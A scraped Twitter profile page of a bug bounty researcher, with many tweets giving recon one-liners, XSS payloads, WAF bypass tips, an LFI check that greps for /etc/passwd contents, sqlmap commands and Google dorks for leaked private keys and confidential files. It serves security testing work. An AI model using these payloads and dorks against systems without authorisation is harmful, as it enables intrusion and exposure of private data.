Otterly @ott3rly Twitter profile

Last Seen Profiles

@grabonius

@LordRisos

@tattsblossom

@EleggFigureB

@CoachPreacher1

@jandakembangstw

@BM_STORE11

@GrandSurfside

@_NOALCOMUNISMO

@Airupthere7

@pengen_stw

@roehm35

@SheGotGame7

@CourtneyDenise8

@Transdev

@BMoemeni

@AustinFootball_

@me_Atto

@jendeukimanoban

@LlamameFreeze

@bold_ishita

@Maplestar_Art

@Anant_ambani1

@ImaanMalys91279

@AlanCowen

@Jaydo_____

@RobertBluey

@olhonavaga

@POETSorg

@motitoliberal

@Yg_hrk10

@YamahaMotoGP

@pengen_stw

@colmhuirecoed

@_nenetandayo

@awaisq68

Otterly

@ott3rly

4 months

Top 3 RXSS payloads I use: `'";//><img/src=x onError="${x};alert(`1`);"> `'";//><Img Src=a OnError=location=src> `'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))> #bugbounty #xss #bugbountytips

6

129

423

Otterly

@ott3rly

6 months

Check out my new blog post: Mass Hunting for Leaked Sensitive Documents #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Mass Hunting for Leaked Sensitive Documents For Bug Bounties - Ott3rly

I will cover my own approach, how it is possible to massively hunt for leaked documents which contains PII or other sensitive data.

ott3rly.com

10

120

421

Otterly

@ott3rly

2 months

Just a while ago, I found a pretty interesting Stored XSS which was injected by visiting the URL: https://www\.target\.com/redirectEndpoint.do?redirectPage=redacted&itemFromOrder="'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))> For some

6

48

228

Otterly

@ott3rly

3 months

I hate when a top-tier bug bounty hunter mentions on some podcast what he/she prefers checking sensitive areas of the application without mentioning where. A lot of beginners need help figuring out how to start and where to look for common issues. Here is my list of critical…

4

52

193

Otterly

@ott3rly

5 months

My favorite ways to find API endpoints: 1️⃣ Check if targets have the swagger UI docs using nuclei: cat targets.txt | nuclei -id swagger-api | anew swagger-ui-endpoints.txt 2️⃣ Bruteforcing using dictionaries like or for better

Assetnote Wordlists

Wordlists that are up to date and effective against the most popular technologies on the internet.

wordlists.assetnote.io

3

57

187

Otterly

@ott3rly

5 months

Checklist 📝 for exploiting Windows IIS targets: ✅ Detect IIS instances - initial step to build wordlist of potential targets: 1️⃣ Nuclei: cat targets.txt | nuclei -silent -id tech-detect | grep "ms-iis" 2️⃣ Shodan dorks: - org:"Target inc." product:"IIS" -…

5

63

169

Otterly

@ott3rly

4 months

I earned $3000 on @bugcrowd . Tip: always recheck the endpoints collected on the "targets" tab on the burp. After testing certain functionalities, new endpoints could appear which might lead to interesting findings. #ItTakesACrowd #bugbounty #bugbountytip

2

11

164

Otterly

@ott3rly

2 months

Check out my new blog post: Mastering Shodan Search Engine #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Mastering Shodan Search Engine

Shodan Dorking lets you find many things - servers, webcams, washing machines, etc. It could be a true gold mine in your Bug Bounty Journey!

ott3rly.com

3

43

165

Otterly

@ott3rly

15 days

Whenever I see this icon on the website, I always open the browser dev tools console and paste these: - Intercom('show'); - Intercom('boot',{email:'known_user @gmail .com'}) If I can see messages of another person, it is an easy bounty! #bugbountytips #bugbounty #ethicalhacker

6

30

159

Otterly

@ott3rly

4 months

Want to test for SQLi, RCE, but the target is behind annoying WAF? These are ways to find the origin IP, to bypass WAF restrictions: ✅ Check shodan first. Use ssl: or http.favicon.hash:<HASH> dorks to check if there are any results. This method is the…

3

39

139

Otterly

@ott3rly

1 month

Sometimes when arjun does not work properly for parameter guessing, I use ffuf instead: ffuf -u " https://target\.com/payment.php?FUZZ=regular" -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt #bugbounty #bugbountytip #bugbountytips

5

24

138

Otterly

@ott3rly

6 days

Quick LFI check oneliner for a fresh target: cat targets.txt | (gau || hakrawler || katana || gospider) | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" #bugbounty #infosec

3

36

133

Otterly

@ott3rly

11 days

One-liner to get subdomains from wayback: curl -s ' http://web\.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey' | sed -e 's_https*://__' -e "s/\/.*//" | sed 's/www\.//g' | sed 's/:80//g' | sort -u #bugbounty #bugbountytips #cybersecuritytips

1

25

124

Otterly

@ott3rly

3 months

Use this Shodan filter, to get more recently added hosts: org:"<Org name>" after:1/1/2024 #BugBounty #informationsecurity #infosec

2

33

123

Otterly

@ott3rly

5 months

As promised, I am sharing my current checklist 📝 for small scope targets (v0.1): - API docs/support pages. Explore functionality to understand the app better. - Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them. -

8

31

114

Otterly

@ott3rly

4 months

I earned $3,000 for my submission on @bugcrowd Tip: always check how the cart handles user input. You can find interesting, business logic errors, injections, etc. #ItTakesACrowd #bugbounty #infosecurity

otterly on Bugcrowd

View otterly’s researcher profile on Bugcrowd, a platform and team of experts connecting organizations to a global crowd of trusted security researchers.

bugcrowd.com

5

4

111

Otterly

@ott3rly

3 months

After playing around with the targeted website, with the proxy on, run this filter to find file uploads: #bugbounty #bugbountytip #bugbountytips

0

17

108

Otterly

@ott3rly

5 months

Good year start 😁 I earned $3,000 for my submission on @bugcrowd #ItTakesACrowd

otterly on Bugcrowd

View otterly’s researcher profile on Bugcrowd, a platform and team of experts connecting organizations to a global crowd of trusted security researchers.

bugcrowd.com

6

5

104

Otterly

@ott3rly

2 months

Do you know that sqlmap has its own crawler? Run in the background easily: sqlmap -u ' https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12 #appsec #SQLi #hacking

2

26

105

Otterly

@ott3rly

2 months

Base checklist 📝 for exploiting Tomcat servers: - Detect: → Wappalyzer → Nuclei → Server error - use this to get the version! → Response headers - Test common ports: 8080, 9080, 9443, 9005, 9009, 8082, 8180 - Try clicking on buttons - this is simply stupid but…

3

27

101

Otterly

@ott3rly

2 months

Check out my new blog post: Port Scanning for Bug Bounties #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Port Scanning for Bug Bounties

Dive into port scanning strategies with nmap, advanced port scanning tactics to make you stand out from the crowd.

ott3rly.com

2

30

97

Otterly

@ott3rly

30 days

Check out my new blog post: XSS WAF Bypass Techniques #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

XSS Web Application Firewall Bypass Techniques

Head dive into techniques for bypassing web application firewall. Explore how firewalls are made and how we can find ways to overcome them.

ott3rly.com

0

30

99

Otterly

@ott3rly

5 months

Check out my new blog post: Hunting Blind XSS on the Large Scale — Practical Techniques #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Hunting Blind XSS on the Large Scale — Practical Techniques

Detect Blind Cross-Site Scripting at scale! Discover the Blind XSS payloads used to bypass WAF, BXSS testing tools and methodology.

ott3rly.com

3

18

99

Otterly

@ott3rly

4 months

Use these commands to parse waymore/gau or any other URL output to find interesting leads: 1️⃣grep -oP '^https?://(?:[^/]*/){2}' waymore.txt | sort -u | tee root-dirs.txt # This output is good for checking different apps of different domains 2️⃣cat waymore.txt | unfurl keys | awk…

4

20

93

Otterly

@ott3rly

2 months

Tip: If you are looking for wayback endpoints either by gau or waymore, do not pass the whole subdomain list of a single target. Both of these tools have a subdomain option, use that instead. #bugbounty #bugbountytips #bugbountytip

1

11

90

Otterly

@ott3rly

1 month

Check out my new blog post: Recon on Steroids & #8211 ; Discover EVEN MORE Subdomains #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Recon on Steroids - Discover EVEN MORE Subdomains

Find websites that nobody else has found. Explore unique methods to discover more core subdomains to increase your bug bounty targets.

ott3rly.com

0

16

88

Otterly

@ott3rly

4 months

I earned $950 for my submission on @bugcrowd Type: Business logic Tip: Try bypassing certain limitations, by using double submit. For example, open 2 browser tabs and try submitting both at the same time. #ItTakesACrowd #bugbounty #ethicalhacking

otterly on Bugcrowd

View otterly’s researcher profile on Bugcrowd, a platform and team of experts connecting organizations to a global crowd of trusted security researchers.

bugcrowd.com

6

4

88

Otterly

@ott3rly

1 month

Check out my new blog post: Jump Over Firewall Finding Origin IP #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Jump Over Firewall Finding Origin IP

Find a way to bypass web application firewall by finding origin IP address as a method. We will explore multiple ways how you can do it.

ott3rly.com

0

26

86

Otterly

@ott3rly

3 months

I earned $450 for my submission on @bugcrowd Even small bounties stack it up over time! Tip: Bypass product limits using race conditions. Either use the newest version of burp or turbo intruder plugin. #ItTakesACrowd #bugbounty #bugbountytips

otterly on Bugcrowd

View otterly’s researcher profile on Bugcrowd, a platform and team of experts connecting organizations to a global crowd of trusted security researchers.

bugcrowd.com

4

5

84

Otterly

@ott3rly

4 months

On @Bugcrowd , In January, I submitted 6 bugs to 4 programs. Award-wise, it's the most profitable platform so far. #bugbounty #TogetherStronger

5

0

81

Otterly

@ott3rly

23 days

Check out my new blog post: Using Nuclei At Mass Scale #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Using Nuclei At Mass Scale - Ott3rly

Nuclei is an extremely powerful tool in Bug Bounty. Too bad most people use it the wrong way! Let me show you the top things that you should know to do

ott3rly.com

2

24

81

Otterly

@ott3rly

4 months

FFUF could be used for fuzzing one endpoint for large amount of alive hosts: cat alive.txt | grep -v "filter" | ffuf -u https://FUZZ/endpoint -w - -fw 1 replace filter and /endpoint with your own :) #bugbounty #bugbountytips #CyberSecurity

1

18

79

Otterly

@ott3rly

2 months

DotGit Firefox extension could get you some serious P1/P2 vulnerabilities. It's a must-have in your hacker toolkit. Easy bug bounty money! #bugbounty #cybersecuritytips #ethicalhacking

1

5

78

Otterly

@ott3rly

3 months

Sometimes Excel files could contain PII leaks, so use this Google dork: site:target\.com inurl:'xlsx' OR site:target\.com inurl:'xls' #ghacking #googlehacking #dorking

0

20

79

Otterly

@ott3rly

4 months

One-liner of favicon hash for shodan: python3 -c "import mmh3,requests,codecs;print(mmh3.hash(codecs.encode(requests.get('[URL]',verify=False).content,'base64')))" Replace URL with and use http.favicon.hash:<HASH> #bugbounty #bugbountytips #infosecurity

2

21

75

Otterly

@ott3rly

3 months

I do have an OSCP cert by the way. Has it helped it to my bug bounty success? Not particularly, but I guess it did have some impact on my initial infosec journey. I have eventually transitioned from pen-testing to full-time bug hunting. #offsec #oscp #tryharder

1

2

76

Otterly

@ott3rly

2 months

Check out my new blog post: Make Money 💸 Using Google Hacking #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Make Money 💸 Using Google Hacking

Find critical security issues just by using Google Search. Yes, it is possible! You're about to enter into the world of Google Dorking.

ott3rly.com

3

21

76

Otterly

@ott3rly

1 month

Just checked tool from @dorkipty . It can gather data from over 100+ search engines and this is a very cool feature. I know this is a pretty fresh tool, so I am looking forward to getting some updates from the team @fattselimi @badcrack3r . The only thing…

Optimize Your Google Dorks with Dorki

Unlock Hidden Assets with Dorki - Master advanced Google dorking strategies. Translate dorks, simplify searches, execute bulk queries easily across search engines. Elevate your search game now!

dorki.io

2

10

76

Otterly

@ott3rly

3 months

Use this one-liner to get a lot of fuzz endpoints from the crawler: cat targets.txt | hakrawler -d 5 -dr -insecure -t 10 -timeout 360 | tee hakrawler.txt #bugbounty #bugbountytips #bugbountytip

2

14

75

Otterly

@ott3rly

4 months

Base checklist for testing AEM instances 📋: ✅ Identify. 1️⃣ Testing manually ⇒ Check wappalyzer. ⇒ Check the source of page, should see adobe links. 2️⃣ Automated approach ⇒ Google Dorking - site: intitle:content/dam ⇒…

0

21

73

Otterly

@ott3rly

7 months

One-liner to find sensitive PDF files on Wayback Machine for multiple domains (in the comments) #bugbountytip #bugbounty #informationsecurity

1

13

70

Otterly

@ott3rly

3 months

Another one-liner to get crawler endpoints: cat targets.txt | gospider -S - -q -d 5 -c 10 --sitemap --no-redirect -o gospider.txt Note: do not use for targets, with too many endpoints, like blogs, e-commerce sites, or social media. #bugbounty #bugbountytips #bugbountytip

1

21

68

Otterly

@ott3rly

4 months

Tip of the day - add the following flag to httpx to get more results: -H 'Referer: localhost' Some servers have checks for headers. You could also experiment with other headers like Origin, X-Forwarded-For and etc. #bugbounty #bugbountytips #infosec

0

17

66

Otterly

@ott3rly

3 months

Have a txt file with the list of js endpoints? Use this nuclei command to check for token leaks: cat js-endpoints.txt | nuclei -tags token,tokens -es info #bugbounty #cybersecuritytips #cybersecurity

1

14

65

Otterly

@ott3rly

22 days

A quick one-liner to get most of the wildcard domains of BBPs: curl -s https://raw\.githubusercontent.com/projectdiscovery/public-bugbounty-programs/main/chaos-bugbounty-list.json | jq ".[][] | select(.bounty==true) | .domains[]" -r #bugbounty #bugbountytip #bugbountytips

0

14

66

Otterly

@ott3rly

3 months

4 Stages of the Bug Bounty Hunter: - Learning about Bug Bounty -> Finding the First VALID Bug. Gain foundational knowledge, learn about vulnerabilities, methodologies, and try to identify initial vulnerabilities. Register on one or multiple bug bounty platforms like Hackerone,

4

13

66

Otterly

@ott3rly

4 months

one-liner to quickly check unusual ports on many hosts using nmap: nmap -iL hosts.txt -Pn --min-rate 1000 --max-retries 1 --max-scan-delay 20ms -T4 --top-ports 1000 --exclude-ports 80,443,53,22,5060,8080 --open -oG nmap.out #bugbounty #networksecurity #nmap

3

12

63

Otterly

@ott3rly

4 months

0

13

64

Otterly

@ott3rly

4 months

If you are thinking of a good port scanner that is simple and fast, you could check out https://github\.com/nullt3r/jfscan I have tested it and it's pretty accurate. Of course, nothing can replace OG Nmap entirely. #networksec #netsec #infosecurity

0

12

62

Otterly

@ott3rly

5 months

Check out my new blog post: Hunting Blind XSS on the Large Scale — Initial Setup #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

3

25

63

Otterly

@ott3rly

2 months

Check out my new blog post: Turning Wayback Machine Into GOLD MINING MACHINE 💰 #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Turning Wayback Machine Into GOLD MINING MACHINE

Learn how to turn Wayback machine, into a gold mining machine! Explore how to analyze historical data, to get some interesting leads!

ott3rly.com

1

18

61

Otterly

@ott3rly

3 months

A quick way to scan for the s3 bucket list: s3scanner -bucket-file s3-buckets.txt -threads 16 | grep -aE 'Read|Write|Full' | tee results.txt #bugbounty #bugbountytip #bugbountytips

0

20

60

Otterly

@ott3rly

4 months

Use this google dork to detect AEM instances: site:target\.com inurl:/content/dam/ #bugbounty #googlehacking #dorking

1

8

62

Otterly

@ott3rly

4 months

If you are using gau to fetch some archive data, make sure to exclude a lot of extensions with --blacklist flag: cat t | gau --subs --blacklist png,jpg,jpeg,gif,mp3,mp4,svg,woff,woff2,etf,eof,otf,css,exe,ttf,eot #itsecurity #bugbounty #informationsecurity

1

10

62

Otterly

@ott3rly

1 month

Use this as a base checklist 📝 when testing cart 🛒functionality: 1️⃣ Is it possible to manipulate prices? - Try adding minus items. - Integer overflows. 2️⃣ Test coupon codes. - Add multiple coupon codes. - Race conditions - XSS payloads 3️⃣ postMessage issues. - Is the event

0

22

62

Otterly

@ott3rly

4 months

Another tip for testing RBAC issues: Use the Multi-Account Containers Firefox plugin. It could create a separate browser environment for each account you are testing. Pretty good tool when you have to test more than 2 account roles. #appsec #infosec #hacking

4

11

59

Otterly

@ott3rly

8 days

Make sure you train your brain everyday. Reading writeups helps me to keep up with a game. I do recommend checking this list of Bug Bounty blogs by @G0LDEN_infosec . https://raw\.githubusercontent.com/g0ldencybersec/bugbountybloglist/main/blogs.txt #bugbounty #bugbountytips

1

11

60

Otterly

@ott3rly

2 months

Will start in ~30 minutes. Here is the link:

Live Recon Part 1 - Epic Games 🔴

It's my first live recon ever. Feel pretty excited. Wish me luck!---Patreon: https://ott3rly.com/patreonTwitter: https://ott3rly.com/twitterDiscord: https://...

www.youtube.com

1

8

59

Otterly

@ott3rly

2 months

Writing a good bug bounty report will result in bigger bounties! There were some cases when I got high severity instead of medium, just because I had put a lot of effort into constructing quality a report. At the end of the day, the human factor plays a big role in bug bounty…

4

11

58

Otterly

@ott3rly

2 months

As promised, I will start doing some live videos after 1k subscribers. The plan is to do a recon part on YouTube and a hacking part on Discord. The main reason for that - hacking on live targets is pretty grey in terms of service of YouTube.

4

1

57

Otterly

@ott3rly

2 months

Another useful thing that sqlmap has is the Google Dorking flag. Combine with your favorite dork increase change finding SQLi: sqlmap -g 'site: inurl:\".php?id=1\"' #SQLi #infosecurity #cybersecurity

1

9

58

Otterly

@ott3rly

2 months

Check out my latest YouTube video: #BugBounty #CyberSec #InfoSec

Find Sensitive Files with FFUF

Learn the ways of content discovery. In this video, we will discover which wordlists you could use and when, the functionality of ffuf fuzzing tool, and more...

www.youtube.com

1

11

52

Otterly

@ott3rly

4 months

Check out my first YouTube video: Would appreciate the feedback down in the comments 😉 #BugBounty #CyberSec #InfoSec

Headstart Your Bug Bounty Recon With AXIOM

Hack your way into bounties! We will explore how you speed up the initial recon part when approaching a new target. My favorite go-to tool is axiom, we'll ex...

www.youtube.com

1

9

50

Otterly

@ott3rly

2 months

Just passed 3000 followers! 🥳🎉🍾👯‍♀️

10

0

49

Otterly

@ott3rly

28 days

I've been asked multiple times about my go-to resources when exploiting certain vulnerability types. For starters, I do recommend checking these resources: PayloadsAllTheThings - is an incredible GitHub repository filled with payloads and techniques for various types of security…

1

11

50

Otterly

@ott3rly

1 month

If you are new to bug bounty and do not have too much knowledge about most of the recon tools, you could try using some recon frameworks. They will help you a lot to do certain tasks in the background without overthinking or overcomplicating. Here is a list of recon frameworks…

2

5

49

Otterly

@ott3rly

3 months

While looking for open redirects, focus on these URL parameters: return,url,callback,forward,redirect,continue,domain,checkout,dest,goto,host,page,next. #bugbounty #bugbountytip #bugbountytips

2

9

49

Otterly

@ott3rly

1 month

Just in case you want to see me struggling to do recon, feel free to join on Friday:

Live Recon Part 2 - Epic Games 🔴

Second live recon on Epic Games bug bounty program. This time I will gather more details about this company's assets on the top that we already have. We will...

www.youtube.com

1

7

46

Otterly

@ott3rly

4 months

Another Google dork to detect AEM instances: site:target\.com inurl:/content/geometrixx/ #bugbounty #googlehacking #dorking

1

7

48

Otterly

@ott3rly

4 months

Match & Replace is a very underrated feature of Burp Suite. I think more people should try to employ it in their test flow. My favorite rules: ✅ Simply replace false with true. This usually helps to unlock many hidden features of targeted web apps. Note in some cases it could

0

8

47

Otterly

@ott3rly

2 months

Check out my latest YouTube video: #BugBounty #CyberSec #InfoSec

SQLi WAF Bypass Techniques Part 1 - Time-Based Attacks

We will explore the various methods on how you can use a Time-Based SQL injection attack on WAF hardened website. This is part 1 of SQL injection WAF bypasse...

www.youtube.com

0

3

45

Otterly

@ott3rly

4 months

one-liner to get root directories () of the targeted domain: cat waymore.txt | grep -oP '^https?://(?:[^/]*/){2}' | sort -u | tee root-dirs.txt Could use this on gau, linkfinder or katana output as well. #bugbountytips #cybersecurity #oneliner

1

11

46

Otterly

@ott3rly

6 months

I don't like new Foxy Proxy interface :(

10

2

45

Otterly

@ott3rly

4 months

One-liner to check FTP issues from port-scanned hosts, using nuclei: cat port-scanned-hosts.txt | grep -E ':21$' | awk -F: '{print $1}' | nuclei -nh -id ftp-anonymous-login,ftp-weak-credentials #bugbounty #bugbountytip #bugbountytips

1

9

43

Otterly

@ott3rly

3 months

Amazing presentation!

Hacking on Bug Bounties for 10 years: Shubs' (@infosec_au) Keynote at...

Join us for an insightful keynote presentation by Shubs (@infosec_au), as he shares a decade's worth of experience in Bug Bounties. Discover key insights, st...

www.youtube.com

0

8

45

Otterly

@ott3rly

4 months

Program has "All in scope" in their policy? Use this checklist 📋 to collect list of root domains: ✅ Inspect the footer of their pages. Sometimes companies like to use same footer across their all domains. For example: "© 2024 The Coca‑Cola Company. All rights reserved." could

0

6

43

Otterly

@ott3rly

3 months

One more google dork to detect AEM instances: site:target\.com inurl:/etc.clientlibs #bugbounty #googlehacking #dorking

1

9

44

Otterly

@ott3rly

4 months

Although both tools are pretty good for SQLi. This is my amateur bug hunter opinion. #bugbounty #infosec #infosecurity

0

2

43

Otterly

@ott3rly

5 months

Hacking is all about trying million techniques until eventually at least one works. Having good methodology/checklists helps a lot. #bugbounty #hacking #hacktheplanet

5

0

42

Otterly

@ott3rly

4 months

Check out my latest YouTube video: #BugBounty #CyberSec #InfoSec

Turning Wayback Machine Into GOLD MINING MACHINE 💰

Discover the ways to parse web archive data! The commands used in this video:grep -oP '^https?://(?:[^/]*/){2}' gau.txt | sort -u | tee root-dirs.txtcat gau....

www.youtube.com

1

8

43

Otterly

@ott3rly

21 days

Just adding small additions to your subfinder or amass config could greatly impact the number of subdomains that you could gather. There are a lot of free services that you could register for, don't be lazy, just do it! #BugBounty #bugbountytips #bugboutytip

5

0

42

Otterly

@ott3rly

2 months

Check out my new blog post: DNS Bruteforce using AXIOM #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Active DNS Recon using AXIOM

Are you interested in getting a lot of subdomains of big targets? You will learn how you can do active DNS bruteforce using puredns.

ott3rly.com

0

8

42

Otterly

@ott3rly

3 months

One more dork for AEM instances: site:target\.com inurl: /libs/cq/security/userinfo.json #bugbounty #dork #dorking

1

9

43

Otterly

@ott3rly

1 month

Just wanted to thank my followers and subscribers for all the support I get. I truly bump up my motivation to keep going. Have a pleasurable day!

3

0

43

Otterly

@ott3rly

5 months

This is simply stupid and common sense for most of you, but it made me the most bounties actually while doing manual hacking. #BugBounty #bugbountytip #cybersecuritytips Check down in the comments! ⬇️⬇️⬇️⬇️⬇️

1

8

42

Otterly

@ott3rly

9 days

Check out my new blog post: Your Own Search Engines For Bug Bounty #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Your Own Search Engines For Bug Bounty

Customize search engines to show you the bug bounty targets. Let's explore the way how you can set up custom search engines.

ott3rly.com

0

5

42

Otterly

@ott3rly

3 months

Some areas could be technically OOS, but looking into it (not hacking) is allowed. It could lead to a bug that is IN SCOPE: - code repositories (GitHub/GitLab, etc.) - documentation pages (confluence, wiki pages, etc.) - cloud storage (AWS buckets, GCP buckets,) - office docs

1

5

42

Otterly

@ott3rly

4 months

Check out my new blog post: Mass Blind Server-Side Testing Setup For Bug Bounty #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Mass Blind Server-Side Testing Setup For Bug Bounty

Discover how to hunt for Out-Of-Bound issues. Set up the OOB Server to detect critical severity findings, which could lead to large bounties!

ott3rly.com

1

10

41

Otterly

@ott3rly

16 days

Check out my new blog post: Building Own Nuclei Templates #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder

Building Own Nuclei Templates - Ott3rly

It's time to break the atoms! We will take a look at how it's possible to create unique nuclei templates! Don't miss out, since I will show you 3 easy

ott3rly.com

0

9

41

Otterly

@ott3rly

4 months

I love it when they ask for a proof of concept video, even though there are 2 steps to reproduce 😉 #sharethelove #peace #TogetherWeAreUnstoppable

2

39

Otterly

@ott3rly

6 months

If you find Open redirect to URI endpoints (x-> /path), it is still possible to elevate to decent vuln. You just need to find the vulnerable enpoint to RXSS. This could be potentialy chained with other vulnerability like ATO or SSRF as well. #bugbounty #bugbountytips #infose

1

4

39

Otterly

@ott3rly

4 months

Check out my latest YouTube video: #BugBounty #CyberSec #InfoSec

Master The Elite Hacker Search Engine

Lay the foundation for easy bounties. We will explore the most important features of the Shodan search engine!Dorks:ssl:"target.com"org:"organization name"ss...

www.youtube.com

2

4

38

Otterly

@ott3rly

3 months

With the right configuration, feroxbuster could be a powerful tool for content discovery. If you haven't tried it, I highly recommend testing it out. It has some awesome features like, dynamically removing scans on the go, basic js crawling, etc. #bugbounty #itsec #itsecurity

2

38

Otterly

@ott3rly

3 months

You will be surprised how much functionality is "hidden" in the app if you just create an account as an organization, not an individual. #bugbounty #bugbountytip #bugbountytips

1

4

37

Otterly

@ott3rly

6 months

Google dork of the day: site: "id_rsa" #BugBounty #BugBountyTip #BugBountyTips #InfoSec #TogetherWeHitHarder

Pastebin.com - #1 paste tool since 2002!

Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.

pastebin.com

0

6

37

Otterly

@ott3rly

4 months

Yo, I have uploaded a new video about Port Scanning I usually use:

Level Up Your Port Scanning Skills

Time to explore some of my favorite port scanning techniques. Use those on 100s of targets at once.Find my gist script for converting Nmap XML output to IP:P...

www.youtube.com

0

2

36

Otterly

@ott3rly

7 months

Google dork of the day: site: ext:pdf "confidential" #BugBounty #BugBountyTip #BugBountyTips #InfoSec #TogetherWeHitHarder

0

4

36

Otterly

@ott3rly

5 months

One-liner to check anonymous LDAP from port scanned hosts (naabu or ruscan output file): cat port-scanned-hosts.txt | grep -E ':389$' | awk -F: '{print $1}' | nuclei -nh -id ldap-anonymous-login #bugbounty #bugbountytip #bugbountytips

1

5

36

Otterly

@ott3rly

8 days

A great talk about recon in depth. I really recommend following him.

Hussein Daher

@HusseiN98D

10 days

⚠️"Attacking Organizations with Big Scope - from 0 to Hero" was my talk at #HitBxPhdays in Bangkok 🇹🇭. Happy to share the slides and recording with the community. 🔴 Slides: 🔴 Recording: Enjoy! #bugbounty #infosec

23

199

606

1

3

35

Otterly

@ott3rly

3 months

500 Subscribers 🍾🥳🎉

Ott3rly

Bug Bounty, Ethical Hacking, Infosec Videos!

www.youtube.com

10

2

34